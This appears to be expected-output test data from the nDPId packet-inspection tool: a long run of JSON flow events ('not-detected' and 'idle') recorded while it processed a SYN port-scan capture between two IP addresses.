+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 